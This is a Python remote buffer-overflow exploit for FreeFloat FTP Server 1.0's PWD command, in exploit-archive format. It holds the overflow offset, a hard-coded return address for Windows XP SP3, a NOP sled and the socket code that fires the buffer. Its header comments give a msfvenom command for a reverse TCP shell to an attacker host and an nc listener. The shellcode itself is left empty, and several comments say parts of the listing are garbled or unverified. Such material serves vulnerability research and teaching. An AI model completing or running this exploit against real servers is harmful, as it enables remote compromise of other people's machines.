
FreeFloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow

# Exploit Title: FreeFloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow
# Date: 08/22/2023
# Exploit Author: Waqas Ahmed Faroouqi (Zeroxinn)
# Vendor Homepage: http://www.freefloat.com
# Version: 1.0
# Tested on: Windows XP SP3 -- the hard-coded return address below is taken
#            from this OS build's ole32.dll and will not be valid elsewhere
#!/usr/bin/python
import socket
# Shellcode: generated with Metasploit, e.g.
#   msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.134 LPORT=4444 -b '\x00\x0d'
#   (the bad-char list in this copy of the listing is garbled/truncated; \x0a is
#    normally excluded as well for a CRLF-terminated FTP command line -- regenerate
#    the shellcode rather than trusting the bytes printed below)
# Listener on the attacker host:  nc -lvp 4444
# Then send the exploit.
# offset         = 247 bytes of filler before the saved return address
# badchars       = \x00 \x0d (third entry truncated in this copy; see above)
# return_address = \x3b\x69\x5a\x77 -> 0x775a693b in ole32.dll (Windows XP SP3),
#                  written little-endian. The listing does not say which
#                  instruction lives there; confirm it is a JMP ESP-style gadget
#                  in a debugger before reusing it.
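# ---------------------------------------------------------------------------
# Shellcode
#
# Generate it with the msfvenom command in the header (reverse TCP shell back
# to LHOST:LPORT with the bad chars excluded) and paste the output here as a
# bytes literal.  The shellcode printed on this page is a corrupted
# transcription: every escape is broken ('\ xNN' is not a hex escape, so
# Python would store the literal text rather than the byte) and many bytes
# appear twice.  A buffer built from it could never hand control to valid
# code, so it is deliberately not reproduced.  With PAYLOAD left empty the
# exploit only crashes the service (EIP overwrite, no shell).
PAYLOAD = b""

# Exploit constants from the header comments.
OFFSET = 247                  # bytes of filler before the saved return address
RET = b"\x3b\x69\x5a\x77"     # 0x775a693b in ole32.dll, Windows XP SP3 only
NOP_SLED = b"\x90" * 10       # landing pad between the return address and the shellcode
BAD_CHARS = b"\x00\x0d"       # bytes the FTP command parser will not pass through
                              # (the header's list is truncated; \x0a is usually needed too)


def _check_bad_chars(buf, bad_chars=BAD_CHARS):
    """Raise ValueError if *buf* contains any byte from *bad_chars*.

    A single bad byte truncates or mangles the command on the server side and
    silently turns a working exploit into a plain crash, so refuse to send it.
    bytearray() is used so the comparison works on ints under both Python 2
    and 3.
    """
    present = sorted(set(bytearray(buf)) & set(bytearray(bad_chars)))
    if present:
        raise ValueError("buffer contains bad chars: %s"
                         % ", ".join("0x%02x" % b for b in present))


def build_buffer(shellcode=PAYLOAD, offset=OFFSET, ret=RET, nop_sled=NOP_SLED):
    """Return the PWD argument: filler, return-address overwrite, NOP sled, shellcode.

    Args:
        shellcode: msfvenom output as bytes.
        offset: number of filler bytes ('a') before EIP is overwritten.
        ret: 4-byte little-endian address placed over the saved return address.
        nop_sled: bytes inserted between *ret* and *shellcode*.

    Raises:
        ValueError: if the assembled buffer contains a bad character.
    """
    buf = b"a" * offset + ret + nop_sled + shellcode
    _check_bad_chars(buf)
    return buf


# Name kept: main() below sends this buffer.
shellCode = build_buffer()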
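def main(ip="192.168.146.135", port=21, timeout=10.0):
    """Log in anonymously and send the overflowing PWD command to *ip*:*port*.

    The FTP dialogue is minimal: read the banner, send USER/PASS (anonymous),
    then send one oversized PWD line built from ``shellCode`` above.  Server
    replies are drained but never checked, and the function returns (or
    raises on a socket error/timeout) without waiting for a connect-back;
    the ``nc -lvp 4444`` listener from the header must already be running on
    LHOST.

    Args:
        ip: target address; defaults to the lab host from the original listing.
        port: target FTP control port.
        timeout: per-operation socket timeout in seconds, so a dead or
            non-FTP target raises ``socket.timeout`` instead of blocking
            forever on recv().
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((ip, port))
        sock.recv(1024)                       # banner
        sock.send(b"USER anonymous\r\n")
        sock.recv(1024)                       # reply to USER
        sock.send(b"PASS anonymous\r\n")
        sock.recv(1024)                       # reply to PASS
        # NOTE(review): the listing shows 'pwd' with no separating space; if
        # the original sent 'PWD ' the 247-byte offset shifts by one.  Do not
        # change this prefix without re-measuring the offset in a debugger.
        sock.send(b"pwd" + shellCode + b"\r\n")
    finally:
        sock.close()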
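# Script entry point: only fire when run directly, not when imported.
if __name__ == "__main__":
    main()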
 